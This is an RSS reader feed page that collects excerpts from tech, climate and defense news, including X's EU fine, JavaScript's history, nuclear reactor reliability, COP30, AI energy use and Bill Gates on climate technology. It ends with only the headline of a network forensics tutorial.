Normal view

There are new articles available, click to refresh the page.
Yesterday — 5 December 2025Main stream

Elon Musk’s X first to be fined under EU’s Digital Services Act

5 December 2025 at 11:15

Elon Musk’s X became the first large online platform fined under the European Union’s Digital Services Act on Friday.

The European Commission announced that X would be fined nearly $140 million, with the potential to face “periodic penalty payments” if the platform fails to make corrections.

A third of the fine came from one of the first moves Musk made when taking over Twitter. In November 2022, he changed the platform’s historical use of a blue checkmark to verify the identities of notable users. Instead, Musk started selling blue checks for about $8 per month, immediately prompting a wave of imposter accounts pretending to be notable celebrities, officials, and brands.

Read full article

Comments

© NurPhoto / Contributor | NurPhoto

Before yesterdayMain stream

Forget Stranger Things—this other Netflix sci-fi thriller is smarter and darker

4 December 2025 at 13:00

Even after some divided reviews of the first batch of its insanely anticipated fifth and final season, Netflix’s crown jewel, Stranger Things, is still a cultural phenomenon. The iconic thriller/sci-fi series’ latest season sits at around 90% on Rotten Tomatoes. For fans who’ve been along for the ride since 2016, its mix of big coming-of-age emotions and even bigger monsters, all dripping with '80s nostalgia, is like comfort viewing at this point.

In 1995, a Netscape employee wrote a hack in 10 days that now runs the Internet

4 December 2025 at 12:59

Thirty years ago today, Netscape Communications and Sun Microsystems issued a joint press release announcing JavaScript, an object scripting language designed for creating interactive web applications. The language emerged from a frantic 10-day sprint at pioneering browser company Netscape, where engineer Brendan Eich hacked together a working internal prototype during May 1995.

While the JavaScript language didn’t ship publicly until that September and didn’t reach a 1.0 release until March 1996, the descendants of Eich’s initial 10-day hack now run on approximately 98.9 percent of all websites with client-side code, making JavaScript the dominant programming language of the web. It’s wildly popular; beyond the browser, JavaScript powers server backends, mobile apps, desktop software, and even some embedded systems. According to several surveys, JavaScript consistently ranks among the most widely used programming languages in the world.

In crafting JavaScript, Netscape wanted a scripting language that could make webpages interactive, something lightweight that would appeal to web designers and non-professional programmers. Eich drew from several influences: The syntax looked like a trendy new programming language called Java to satisfy Netscape management, but its guts borrowed concepts from Scheme, a language Eich admired, and Self, which contributed JavaScript’s prototype-based object model.

Read full article

Comments

© Netscape / Benj Edwards

Why the grid relies on nuclear reactors in the winter

4 December 2025 at 06:00

As many of us are ramping up with shopping, baking, and planning for the holiday season, nuclear power plants are also getting ready for one of their busiest seasons of the year.

Here in the US, nuclear reactors follow predictable seasonal trends. Summer and winter tend to see the highest electricity demand, so plant operators schedule maintenance and refueling for other parts of the year.

This scheduled regularity might seem mundane, but it’s quite the feat that operational reactors are as reliable and predictable as they are. It leaves some big shoes to fill for next-generation technology hoping to join the fleet in the next few years.

Generally, nuclear reactors operate at constant levels, as close to full capacity as possible. In 2024, for commercial reactors worldwide, the average capacity factor—the ratio of actual energy output to the theoretical maxiumum—was 83%. North America rang in at an average of about 90%.

(I’ll note here that it’s not always fair to just look at this number to compare different kinds of power plants—natural-gas plants can have lower capacity factors, but it’s mostly because they’re more likely to be intentionally turned on and off to help meet uneven demand.)

Those high capacity factors also undersell the fleet’s true reliability—a lot of the downtime is scheduled. Reactors need to refuel every 18 to 24 months, and operators tend to schedule those outages for the spring and fall, when electricity demand isn’t as high as when we’re all running our air conditioners or heaters at full tilt.

Take a look at this chart of nuclear outages from the US Energy Information Administration. There are some days, especially at the height of summer, when outages are low, and nearly all commercial reactors in the US are operating at nearly full capacity. On July 28 of this year, the fleet was operating at 99.6%. Compare that with  the 77.6% of capacity on October 18, as reactors were taken offline for refueling and maintenance. Now we’re heading into another busy season, when reactors are coming back online and shutdowns are entering another low point.

That’s not to say all outages are planned. At the Sequoyah nuclear power plant in Tennessee, a generator failure in July 2024 took one of two reactors offline, an outage that lasted nearly a year. (The utility also did some maintenance during that time to extend the life of the plant.) Then, just days after that reactor started back up, the entire plant had to shut down because of low water levels.

And who can forget the incident earlier this year when jellyfish wreaked havoc on not one but two nuclear power plants in France? In the second instance, the squishy creatures got into the filters of equipment that sucks water out of the English Channel for cooling at the Paluel nuclear plant. They forced the plant to cut output by nearly half, though it was restored within days.

Barring jellyfish disasters and occasional maintenance, the global nuclear fleet operates quite reliably. That wasn’t always the case, though. In the 1970s, reactors operated at an average capacity factor of just 60%. They were shut down nearly as often as they were running.

The fleet of reactors today has benefited from decades of experience. Now we’re seeing a growing pool of companies aiming to bring new technologies to the nuclear industry.

Next-generation reactors that use new materials for fuel or cooling will be able to borrow some lessons from the existing fleet, but they’ll also face novel challenges.

That could mean early demonstration reactors aren’t as reliable as the current commercial fleet at first. “First-of-a-kind nuclear, just like with any other first-of-a-kind technologies, is very challenging,” says Koroush Shirvan, a professor of nuclear science and engineering at MIT.

That means it will probably take time for molten-salt reactors or small modular reactors, or any of the other designs out there to overcome technical hurdles and settle into their own rhythm. It’s taken decades to get to a place where we take it for granted that the nuclear fleet can follow a neat seasonal curve based on electricity demand. 

There will always be hurricanes and electrical failures and jellyfish invasions that cause some unexpected problems and force nuclear plants (or any power plants, for that matter) to shut down. But overall, the fleet today operates at an extremely high level of consistency. One of the major challenges ahead for next-generation technologies will be proving that they can do the same.

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

OpenAI CEO declares “code red” as Gemini gains 200 million users in 3 months

2 December 2025 at 17:42

The shoe is most certainly on the other foot. On Monday, OpenAI CEO Sam Altman reportedly declared a “code red” at the company to improve ChatGPT, delaying advertising plans and other products in the process,  The Information reported based on a leaked internal memo. The move follows Google’s release of its Gemini 3 model last month, which has outperformed ChatGPT on some industry benchmark tests and sparked high-profile praise on social media.

In the memo, Altman wrote, “We are at a critical time for ChatGPT.” The company will push back work on advertising integration, AI agents for health and shopping, and a personal assistant feature called Pulse. Altman encouraged temporary team transfers and established daily calls for employees responsible for enhancing the chatbot.

The directive creates an odd symmetry with events from December 2022, when Google management declared its own “code red” internal emergency after ChatGPT launched and rapidly gained in popularity. At the time, Google CEO Sundar Pichai reassigned teams across the company to develop AI prototypes and products to compete with OpenAI’s chatbot. Now, three years later, the AI industry is in a very different place.

Read full article

Comments

© Anadolu via Getty Images

This GivingTuesday, one campaign aims to turn generosity into a lifeline for military families

2 December 2025 at 12:21

Interview transcript:

Terry Gerton: It is GivingTuesday and so I’m delighted to start this story with Navy-Marine Corps Relief Society. But as we sit here today, coming off of the longest shutdown in government history, walk us through how military families are doing right now. How did that shutdown affect them?

Robert Ruark: That’s an absolutely great question. I think the way military families feel is it can certainly affect their confidence in basically in the support of their families. And that’s the big thing is that if their pay is uncertain, then it is absolutely necessary that they have to have a backstop for that. So one of the things that’s come up with a lot of the banks that cater to the military is the Payroll Protection Plan, the PPP. So the banks like USAA, Navy Federal Credit Union, PenFed, PenAir, a lot of them to cater to the military, they have those. And where you can virtually, you got to get signed up for that if you’re basically active duty service member because they can guarantee a great part of that payday. But if you’re not, you talk about stress. I mean, there’s enough stress in military life between inflation, global conflict potential, unplanned deployments that are going on quite a bit right now, housing and gas prices and basic life events that happen to your families, especially when you’re raising a young family with children at a military base and you’re forced to relocate, deploy all the time, your spouse is trying to find work and it’s really difficult to do that. So to not pay a service member, to a service member, in my opinion, is a sin because of what they do for this nation because they’re not necessarily doing it for themselves. They’re doing it because they want to be part of something much bigger and that’s the country and the country that they love. There’s a very mutual relationship there. So you want that confidence. You don’t ever want to lose that confidence. So I think pay has to be there. We were taught when I was a young Marine: pay, mail and food. Pay, mail and chow is what we call it, but you need those three things. Those are rights. And so I think every military service member views it as a right to be paid on time.

Terry Gerton: People who aren’t familiar or haven’t lived a military lifestyle may not understand all of the things that you just walked us through. And that’s, I think, what makes this GivingTuesday campaign so interesting. Navy-Marine Corps Relief Society has partnered for the fourth year in a row with the other military aid societies for GivingTuesday. Tell us about that partnership and what it means for military families who may be facing some of the stresses you just described.

Robert Ruark: I think the best part about the partnership is, as everyone knows in the country that follows the armed forces, we consider ourselves a joint force. And so that should also apply to the military nonprofits. Unfortunately, most of the our nonprofit peers outside the military aren’t really partnered with a lot of people. There’s maybe a few exceptions, of course, but the bottom line is we thought we would do something about four years ago that would be really new. And so we decided to partner to benefit all of us because we fight together, we train together in a joint environment. So we decided on GivingTuesday, the last few years, to the four military aid societies, the Army Emergency Relief, Air Force Aid Society, Coast Guard Mutual Assistance and Navy-Marine Corps Relief Society, we would join forces to raise important funds to support military families in need through a different campaign each year. This year’s campaign is ‘Make Giving Your Superpower.’

Terry Gerton: Tell us about that campaign theme and why you chose it.

Robert Ruark: So the campaign is being conducted today on social media with the one-day goal to provide active duty service members and family members with vital emergency relief, financial support and education assistance. Those are the three things that we all have in common that we do to support everybody.

Terry Gerton: And how do you hope folks resonate with that superpower theme?

Robert Ruark: Well, the theme is a challenge to Americans to step up, suit up and make giving your superpower for the heroes who serve this country every day. All the donors need to do is visit the website missiongive.us. We believe our service members are truly superhuman in many ways and this is one way to honor their service. And the money goes straight to those different ways that we all support them. Financial assistance, education assistance, disaster assistance. And it goes primarily to those junior service members, the E-5s and below, with probably about five years or less service and a lot of them are married, they don’t make a lot of money and they’re looking to really improve their lives.

Terry Gerton: I’m speaking with retired Marine Corps Lt. Gen. Bob Ruark. He’s the president and CEO of the Navy-Marine Corps Relief Society. So something that’s really interesting with your campaign this year, you have a major matching gift partner. Tell us about Lockheed Martin’s role in this year’s campaign.

Robert Ruark: Lockheed Martin is the, of course, the global aerospace defense company. About three years ago, they started the $1 million match for all contributions, doubling the impact. That made this not only a competition, but a wonderful thing that very few nonprofits have. And so last year, we raised $1.3 million, which clearly doubled the impact. And so visiting missiongive.us is really what we ask, but that money will go right back out to the troops and especially those that are deployed, the families that are behind and help them with a lot of their needs. For example, financial assistance is our biggest need. And right now, the Navy-Marine Corps Relief Society alone, we do $50 million of financial assistance a year, interest-rate loans and grants and we sit and we do budgets. We do financial education. We do everything we can to help them basically make the money or make the dollars go as far as they can.

Terry Gerton: But if someone wants to go beyond giving on GivingTuesday and get involved, what are the opportunities and how might someone become a volunteer with you?

Robert Ruark: Well, there’s enormous opportunities. They can visit one of our offices at one of those 52 major Navy and Marine Corps bases. They can go to nmcrs.org. They can call us. They can email us. We will always accept the volunteers. And the best part about that is the volunteers, in a lot of cases, get some great training. They become caseworkers in financial situations. They can get retail experience in our thrift shops. They can assist the visiting nurse program because it’s in such demand where we make 12,000 patient contacts each year, and they can learn budgeting and be able to do that financial education. So there’s enormous capabilities to grow and we know military spouse unemployment, I should say, is a huge issue. They can get some skills and then hopefully apply those to a real job.

Terry Gerton: Do your volunteers have to be connected to the military or can they be real-life civilians?

Robert Ruark: They can be real life civilians. It is so easy.

Terry Gerton: Well, give us the website one more time.

Robert Ruark: Ours is nmcrs.org and the GivingTuesday website to give to all of us to choose your favorite military aid society is missiongive.us and please thank Lockheed Martin in some way, shape or form because they’re making it happen with a billion-dollar match.

The post This GivingTuesday, one campaign aims to turn generosity into a lifeline for military families first appeared on Federal News Network.

© Getty Images/MivPiv

American soldier in uniform holding a donation jar

Reintroduced carnivores’ impacts on ecosystems are still coming into focus

28 November 2025 at 07:15

When the US Fish and Wildlife Service reintroduced 14 gray wolves to Yellowstone National Park in 1995, the animals were, in some ways, stepping into a new world.

After humans hunted wolves to near-extinction across the Western US in the early 20th century, the carnivore’s absence likely altered ecosystems and food webs across the Rocky Mountains. Once wolves were reintroduced to the landscape, scientists hoped to learn if, and how quickly, these changes could be reversed.

Despite studies claiming to show early evidence of a tantalizing relationship between wolves and regenerating riparian ecosystems since the canines returned to Yellowstone, scientists are still debating how large carnivores impact vegetation and other animals, according to a new paper published this month.

Read full article

Comments

© Qian Weizhong/VCG via Getty Images

Germany unveils long-endurance Greyshark underwater drones

27 November 2025 at 10:40
EUROATLAS, the German advanced defense technologies company, has announced the launch of its new GREYSHARK family of autonomous underwater vehicles, introducing two multi-mission platforms designed for long-range underwater intelligence, surveillance, and reconnaissance. The company says the new Bravo and Foxtrot AUVs will provide militaries and critical-infrastructure operators with persistent underwater awareness at a time when […]

Danish Terma expands C-UAS portfolio with UK’s OSL acquisition

27 November 2025 at 10:35
Terma A/S announced on November 27, 2025, that it has completed the acquisition of OSL Technology, a UK company known for counter-drone and intelligent security systems. According to the company, the move strengthens its strategy to expand market-ready Counter-Unmanned Aircraft Systems and critical-infrastructure protection solutions. OSL is a UK specialist with long-running experience in civil […]

This year’s UN climate talks avoided fossil fuels, again

27 November 2025 at 06:00

If we didn’t have pictures and videos, I almost wouldn’t believe the imagery that came out of this year’s UN climate talks.

Over the past few weeks in Belem, Brazil, attendees dealt with oppressive heat and flooding, and at one point a literal fire broke out, delaying negotiations. The symbolism was almost too much to bear.

While many, including the president of Brazil, framed this year’s conference as one of action, the talks ended with a watered-down agreement. The final draft doesn’t even include the phrase “fossil fuels.”

As emissions and global temperatures reach record highs again this year, I’m left wondering: Why is it so hard to formally acknowledge what’s causing the problem?

This is the 30th time that leaders have gathered for the Conference of the Parties, or COP, an annual UN conference focused on climate change. COP30 also marks 10 years since the gathering that produced the Paris Agreement, in which world powers committed to limiting global warming to “well below” 2.0 °C above preindustrial levels, with a goal of staying below the 1.5 °C mark. (That’s 3.6 °F and 2.7 °F, respectively, for my fellow Americans.)

Before the conference kicked off this year, host country Brazil’s president, Luiz Inácio Lula da Silva, cast this as the “implementation COP” and called for negotiators to focus on action, and specifically to deliver a road map for a global transition away from fossil fuels.

The science is clear—burning fossil fuels emits greenhouse gases and drives climate change. Reports have shown that meeting the goal of limiting warming to 1.5 °C would require stopping new fossil-fuel exploration and development.

The problem is, “fossil fuels” might as well be a curse word at global climate negotiations. Two years ago, fights over how to address fossil fuels brought talks at COP28 to a standstill. (It’s worth noting that the conference was hosted in Dubai in the UAE, and the leader was literally the head of the country’s national oil company.)

The agreement in Dubai ended up including a line that called on countries to transition away from fossil fuels in energy systems. It was short of what many advocates wanted, which was a more explicit call to phase out fossil fuels entirely. But it was still hailed as a win. As I wrote at the time: “The bar is truly on the floor.”

And yet this year, it seems we’ve dug into the basement.

At one point about 80 countries, a little under half of those present, demanded a concrete plan to move away from fossil fuels.

But oil producers like Saudi Arabia were insistent that fossil fuels not be singled out. Other countries, including some in Africa and Asia, also made a very fair point: Western nations like the US have burned the most fossil fuels and benefited from it economically. This contingent maintains that legacy polluters have a unique responsibility to finance the transition for less wealthy and developing nations rather than simply barring them from taking the same development route. 

The US, by the way, didn’t send a formal delegation to the talks, for the first time in 30 years. But the absence spoke volumes. In a statement to the New York Times that sidestepped the COP talks, White House spokesperson Taylor Rogers said that president Trump had “set a strong example for the rest of the world” by pursuing new fossil-fuel development.

To sum up: Some countries are economically dependent on fossil fuels, some don’t want to stop depending on fossil fuels without incentives from other countries, and the current US administration would rather keep using fossil fuels than switch to other energy sources. 

All those factors combined help explain why, in its final form, COP30’s agreement doesn’t name fossil fuels at all. Instead, there’s a vague line that leaders should take into account the decisions made in Dubai, and an acknowledgement that the “global transition towards low greenhouse-gas emissions and climate-resilient development is irreversible and the trend of the future.”

Hopefully, that’s true. But it’s concerning that even on the world’s biggest stage, naming what we’re supposed to be transitioning away from and putting together any sort of plan to actually do it seems to be impossible.

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Benchmarking Chinese CPUs

By: Lewin Day
26 November 2025 at 19:00

When it comes to PCs, Westerners are most most familiar with x86/x64 processors from Intel and AMD, with Apple Silicon taking up a significant market share, too. However, in China, a relatively new CPU architecture is on the rise. A fabless semiconductor company called Loongson has been producing chips with its LoongArch architecture since 2021. These chips remain rare outside China, but some in the West have been benchmarking them.

[Daniel Lemire] has recently blogged about the performance of the Loongson 3A6000, which debuted in late 2023. The chip was put through a range of simple benchmarking tests, involving float processing and string transcoding operations. [Daniel] compared it to the Intel Xeon Gold 6338 from 2021, noting the Intel chip pretty much performed better across the board. No surprise given its extra clock rate. Meanwhile, the gang over at [Chips and Cheese] ran even more exhaustive tests on the same chip last year. The Loongson was put through typical tasks like  compressing archives and encoding video. The outlet came to the conclusion that the chip was a little weaker than older CPUs like AMD’s Zen 2 line and Intel’s 10th generation Core chips. It’s also limited as a four-core chip compared to modern Intel and AMD lines that often start at 6 cores as a minimum.

If you find yourself interested in Loongson’s product, don’t get too excited. They’re not exactly easy to lay your hands on outside of China, and even the company’s own website is difficult to access from beyond those shores. You might try reaching out to Loongson-oriented online communities if you seek such hardware.

Different CPU architectures have perhaps never been more relevant, particularly as we see the x86 stalwarts doing battle with the rise of desktop and laptop ARM processors. If you’ve found something interesting regarding another obscure kind of CPU, don’t hesitate to let the tipsline know!

Three things to know about the future of electricity

20 November 2025 at 04:00

One of the dominant storylines I’ve been following through 2025 is electricity—where and how demand is going up, how much it costs, and how this all intersects with that topic everyone is talking about: AI.

Last week, the International Energy Agency released the latest version of the World Energy Outlook, the annual report that takes stock of the current state of global energy and looks toward the future. It contains some interesting insights and a few surprising figures about electricity, grids, and the state of climate change. So let’s dig into some numbers, shall we?

We’re in the age of electricity

Energy demand in general is going up around the world as populations increase and economies grow. But electricity is the star of the show, with demand projected to grow by 40% in the next 10 years.

China has accounted for the bulk of electricity growth for the past 10 years, and that’s going to continue. But emerging economies outside China will be a much bigger piece of the pie going forward. And while advanced economies, including the US and Europe, have seen flat demand in the past decade, the rise of AI and data centers will cause demand to climb there as well.

Air-conditioning is a major source of rising demand. Growing economies will give more people access to air-conditioning; income-driven AC growth will add about 330 gigawatts to global peak demand by 2035. Rising temperatures will tack on another 170 GW in that time. Together, that’s an increase of over 10% from 2024 levels.  

AI is a local story

This year, AI has been the story that none of us can get away from. One number that jumped out at me from this report: In 2025, investment in data centers is expected to top $580 billion. That’s more than the $540 billion spent on the global oil supply. 

It’s no wonder, then, that the energy demands of AI are in the spotlight. One key takeaway is that these demands are vastly different in different parts of the world.

Data centers still make up less than 10% of the projected increase in total electricity demand between now and 2035. It’s not nothing, but it’s far outweighed by sectors like industry and appliances, including air conditioners. Even electric vehicles will add more demand to the grid than data centers.

But AI will be the factor for the grid in some parts of the world. In the US, data centers will account for half the growth in total electricity demand between now and 2030.

And as we’ve covered in this newsletter before, data centers present a unique challenge, because they tend to be clustered together, so the demand tends to be concentrated around specific communities and on specific grids. Half the data center capacity that’s in the pipeline is close to large cities.

Look out for a coal crossover

As we ask more from our grid, the key factor that’s going to determine what all this means for climate change is what’s supplying the electricity we’re using.

As it stands, the world’s grids still primarily run on fossil fuels, so every bit of electricity growth comes with planet-warming greenhouse-gas emissions attached. That’s slowly changing, though.

Together, solar and wind were the leading source of electricity in the first half of this year, overtaking coal for the first time. Coal use could peak and begin to fall by the end of this decade.

Nuclear could play a role in replacing fossil fuels: After two decades of stagnation, the global nuclear fleet could increase by a third in the next 10 years. Solar is set to continue its meteoric rise, too. Of all the electricity demand growth we’re expecting in the next decade, 80% is in places with high-quality solar irradiation—meaning they’re good spots for solar power.

Ultimately, there are a lot of ways in which the world is moving in the right direction on energy. But we’re far from moving fast enough. Global emissions are, once again, going to hit a record high this year. To limit warming and prevent the worst effects of climate change, we need to remake our energy system, including electricity, and we need to do it faster. 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Kubernetes Cluster Goes Mobile in Pet Carrier

18 November 2025 at 22:00

There’s been a bit of a virtualization revolution going on for the last decade or so, where tools like Docker and LXC have made it possible to quickly deploy server applications without worrying much about dependency issues. Of course as these tools got adopted we needed more tools to scale them easily. Enter Kubernetes, a container orchestration platform that normally herds fleets of microservices in sprawling cloud architectures, but it turns out it’s perfectly happy running on a tiny computer stuffed in a cat carrier.

This was a build for the recent Kubecon in Atlanta, and the project’s creator [Justin] wanted it to have an AI angle to it since the core compute in the backpack is an NVIDIA DGX Spark. When someone scans the QR code, the backpack takes a picture and then runs it through a two-node cluster on the Spark running a local AI model that stylizes the picture and sends it back to the user. Only the AI workload runs on the Spark; [Justin] also is using a LattePanda to handle most of everything else rather than host everything on the Spark.

To get power for the mobile cluster [Justin] is using a small power bank, and with that it gets around three hours of use before it needs to be recharged. Originally it was planned to work on the WiFi at the conference as well but this was unreliable and he switched to using a USB tether to his phone. It was a big hit with the conference goers though, with people using it around every ten minutes while he had it on his back. Of course you don’t need a fancy NVIDIA product to run a portable kubernetes cluster. You can always use a few old phones to run one as well.

Google is still aiming for its “moonshot” 2030 energy goals

13 November 2025 at 06:00

Last week, we hosted EmTech MIT, MIT Technology Review’s annual flagship conference in Cambridge, Massachusetts. Over the course of three days of main-stage sessions, I learned about innovations in AI, biotech, and robotics. 

But as you might imagine, some of this climate reporter’s favorite moments came in the climate sessions. I was listening especially closely to my colleague James Temple’s discussion with Lucia Tian, head of advanced energy technologies at Google. 

They spoke about the tech giant’s growing energy demand and what sort of technologies the company is looking to to help meet it. In case you weren’t able to join us, let’s dig into that session and consider how the company is thinking about energy in the face of AI’s rapid rise. 

I’ve been closely following Google’s work in energy this year. Like the rest of the tech industry, the company is seeing ballooning electricity demand in its data centers. That could get in the way of a major goal that Google has been talking about for years. 

See, back in 2020, the company announced an ambitious target: by 2030, it aimed to run on carbon-free energy 24-7. Basically, that means Google would purchase enough renewable energy on the grids where it operates to meet its entire electricity demand, and the purchases would match up so the electricity would have to be generated when the company was actually using energy. (For more on the nuances of Big Tech’s renewable-energy pledges, check out James’s piece from last year.)

Google’s is an ambitious goal, and on stage, Tian said that the company is still aiming for it but acknowledged that it’s looking tough with the rise of AI. 

“It was always a moonshot,” she said. “It’s something very, very hard to achieve, and it’s only harder in the face of this growth. But our perspective is, if we don’t move in that direction, we’ll never get there.”

Google’s total electricity demand more than doubled from 2020 to 2024, according to its latest Environmental Report. As for that goal of 24-7 carbon-free energy? The company is basically treading water. While it was at 67% for its data centers in 2020, last year it came in at 66%. 

Not going backwards is something of an accomplishment, given the rapid growth in electricity demand. But it still leaves the company some distance away from its finish line.

To close the gap, Google has been signing what feels like constant deals in the energy space. Two recent announcements that Tian talked about on stage were a project involving carbon capture and storage at a natural-gas plant in Illinois and plans to reopen a shuttered nuclear power plant in Iowa. 

Let’s start with carbon capture. Google signed an agreement to purchase most of the electricity from a new natural-gas plant, which will capture and store about 90% of its carbon dioxide emissions. 

That announcement was controversial, with critics arguing that carbon capture keeps fossil-fuel infrastructure online longer and still releases greenhouse gases and other pollutants into the atmosphere. 

One question that James raised on stage: Why build a new natural-gas plant rather than add equipment to an already existing facility? Tacking on equipment to an operational plant would mean cutting emissions from the status quo, rather than adding entirely new fossil-fuel infrastructure. 

The company did consider many existing plants, Tian said. But, as she put it, “Retrofits aren’t going to make sense everywhere.” Space can be limited at existing plants, for example, and many may not have the right geology to store carbon dioxide underground. 

“We wanted to lead with a project that could prove this technology at scale,” Tian said. This site has an operational Class VI well, the type used for permanent sequestration, she added, and it also doesn’t require a big pipeline buildout. 

Tian also touched on the company’s recent announcement that it’s collaborating with NextEra Energy to reopen Duane Arnold Energy Center, a nuclear power plant in Iowa. The company will purchase electricity from that plant, which is scheduled to reopen in 2029. 

As I covered in a story earlier this year, Duane Arnold was basically the final option in the US for companies looking to reopen shuttered nuclear power plants. “Just a few years back, we were still closing down nuclear plants in this country,” Tian said on stage. 

While each reopening will look a little different, Tian highlighted the groups working to restart the Palisades plant in Michigan, which was the first reopening to be announced, last spring. “They’re the real heroes of the story,” she said.

I’m always interested to get a peek behind the curtain at how Big Tech is thinking about energy. I’m skeptical but certainly interested to see how Google’s, and the rest of the industry’s, goals shape up over the next few years. 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

U.S. clears Denmark for $318M AIM-9X missile purchase

13 November 2025 at 03:45
A new United States authorization could further strengthen air-defense cooperation with a key NATO ally. On November 12, the State Department approved a possible Foreign Military Sale to Denmark involving AIM-9X Block II tactical missiles and related equipment, with an estimated value of $318.4 million. The Defense Security Cooperation Agency has delivered the required certification […]

Stop worrying about your AI footprint. Look at the big picture instead.

6 November 2025 at 06:00

Picture it: I’m minding my business at a party, parked by the snack table (of course). A friend of a friend wanders up, and we strike up a conversation. It quickly turns to work, and upon learning that I’m a climate technology reporter, my new acquaintance says something like: “Should I be using AI? I’ve heard it’s awful for the environment.” 

This actually happens pretty often now. Generally, I tell people not to worry—let a chatbot plan your vacation, suggest recipe ideas, or write you a poem if you want. 

That response might surprise some people, but I promise I’m not living under a rock, and I have seen all the concerning projections about how much electricity AI is using. Data centers could consume up to 945 terawatt-hours annually by 2030. (That’s roughly as much as Japan.) 

But I feel strongly about not putting the onus on individuals, partly because AI concerns remind me so much of another question: “What should I do to reduce my carbon footprint?” 

That one gets under my skin because of the context: BP helped popularize the concept of a carbon footprint in a marketing campaign in the early 2000s. That framing effectively shifts the burden of worrying about the environment from fossil-fuel companies to individuals. 

The reality is, no one person can address climate change alone: Our entire society is built around burning fossil fuels. To address climate change, we need political action and public support for researching and scaling up climate technology. We need companies to innovate and take decisive action to reduce greenhouse-gas emissions. Focusing too much on individuals is a distraction from the real solutions on the table. 

I see something similar today with AI. People are asking climate reporters at barbecues whether they should feel guilty about using chatbots too frequently when we need to focus on the bigger picture. 

Big tech companies are playing into this narrative by providing energy-use estimates for their products at the user level. A couple of recent reports put the electricity used to query a chatbot at about 0.3 watt-hours, the same as powering a microwave for about a second. That’s so small as to be virtually insignificant.

But stopping with the energy use of a single query obscures the full truth, which is that this industry is growing quickly, building energy-hungry infrastructure at a nearly incomprehensible scale to satisfy the AI appetites of society as a whole. Meta is currently building a data center in Louisiana with five gigawatts of computational power—about the same demand as the entire state of Maine at the summer peak.  (To learn more, read our Power Hungry series online.)

Increasingly, there’s no getting away from AI, and it’s not as simple as choosing to use or not use the technology. Your favorite search engine likely gives you an AI summary at the top of your search results. Your email provider’s suggested replies? Probably AI. Same for chatting with customer service while you’re shopping online. 

Just as with climate change, we need to look at this as a system rather than a series of individual choices. 

Massive tech companies using AI in their products should be disclosing their total energy and water use and going into detail about how they complete their calculations. Estimating the burden per query is a start, but we also deserve to see how these impacts add up for billions of users, and how that’s changing over time as companies (hopefully) make their products more efficient. Lawmakers should be mandating these disclosures, and we should be asking for them, too. 

That’s not to say there’s absolutely no individual action that you can take. Just as you could meaningfully reduce your individual greenhouse-gas emissions by taking fewer flights and eating less meat, there are some reasonable things that you can do to reduce your AI footprint. Generating videos tends to be especially energy-intensive, as does using reasoning models to engage with long prompts and produce long answers. Asking a chatbot to help plan your day, suggest fun activities to do with your family, or summarize a ridiculously long email has relatively minor impact. 

Ultimately, as long as you aren’t relentlessly churning out AI slop, you shouldn’t be too worried about your individual AI footprint. But we should all be keeping our eye on what this industry will mean for our grid, our society, and our planet. 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Four thoughts from Bill Gates on climate tech

30 October 2025 at 07:00

Bill Gates doesn’t shy away or pretend modesty when it comes to his stature in the climate world today. “Well, who’s the biggest funder of climate innovation companies?” he asked a handful of journalists at a media roundtable event last week. “If there’s someone else, I’ve never met them.”

The former Microsoft CEO has spent the last decade investing in climate technology through Breakthrough Energy, which he founded in 2015. Ahead of the UN climate meetings kicking off next week, Gates published a memo outlining what he thinks activists and negotiators should focus on and how he’s thinking about the state of climate tech right now. Let’s get into it. 

Are we too focused on near-term climate goals?

One of the central points Gates made in his new memo is that he thinks the world is too focused on near-term emissions goals and national emissions reporting.

So in parallel with the national accounting structure for emissions, Gates argues, we should have high-level climate discussions at events like the UN climate conference. Those discussions should take a global view on how to reduce emissions in key sectors like energy and heavy industry.

“The way everybody makes steel, it’s the same. The way everybody makes cement, it’s the same. The way we make fertilizer, it’s all the same,” he says.

As he noted in one recent essay for MIT Technology Review, he sees innovation as the key to cutting the cost of clean versions of energy, cement, vehicles, and so on. And once products get cheaper, they can see wider adoption.

What’s most likely to power our grid in the future?

“In the long run, probably either fission or fusion will be the cheapest way to make electricity,” he says. (It should be noted that, as with most climate technologies, Gates has investments in both fission and fusion companies through Breakthrough Energy Ventures, so he has a vested interest here.)

He acknowledges, though, that reactors likely won’t come online quickly enough to meet rising electricity demand in the US: “I wish I could deliver nuclear fusion, like, three years earlier than I can.”

He also spoke to China’s leadership in both nuclear fission and fusion energy. “The amount of money they’re putting [into] fusion is more than the rest of the world put together times two. I mean, it’s not guaranteed to work. But name your favorite fusion approach here in the US—there’s a Chinese project.”

Can carbon removal be part of the solution?

I had my colleague James Temple’s recent story on what’s next for carbon removal at the top of my mind, so I asked Gates if he saw carbon credits or carbon removal as part of the problematic near-term thinking he wrote about in the memo.

Gates buys offsets to cancel out his own personal emissions, to the tune of about $9 million a year, he said at the roundtable, but doesn’t expect many of those offsets to make a significant dent in climate progress on a broader scale: “That stuff, most of those technologies, are a complete dead end. They don’t get you cheap enough to be meaningful.

“Carbon sequestration at $400, $200, $100, can never be a meaningful part of this game. If you have a technology that starts at $400 and can get to $4, then hallelujah, let’s go. I haven’t seen that one. There are some now that look like they can get to $40 or $50, and that can play somewhat of a role.”

 Will AI be good news for innovation? 

During the discussion, I started a tally in the corner of my notebook, adding a tick every time Gates mentioned AI. Over the course of about an hour, I got to six tally marks, and I definitely missed making a few.

Gates acknowledged that AI is going to add electricity demand, a challenge for a US grid that hasn’t seen net demand go up for decades. But so too will electric cars and heat pumps. 

I was surprised at just how positively he spoke about AI’s potential, though:

“AI will accelerate every innovation pipeline you can name: cancer, Alzheimer’s, catalysts in material science, you name it. And we’re all trying to figure out what that means. That is the biggest change agent in the world today, moving at a pace that is very, very rapid … every breakthrough energy company will be able to move faster because of using those tools, some very dramatically.”

I’ll add that, as I’ve noted here before, I’m skeptical of big claims about AI’s potential to be a silver bullet across industries, including climate tech. (If you missed it, check out this story about AI and the grid from earlier this year.) 

This article is from The Spark, MIT Technology Review’s weekly climate newsletter. To receive it in your inbox every Wednesday, sign up here.

Network Forensics: Analyzing a Server Compromise (CVE-2022-25237)

24 October 2025 at 10:34

Welcome back, aspiring forensic and incident response investigators.

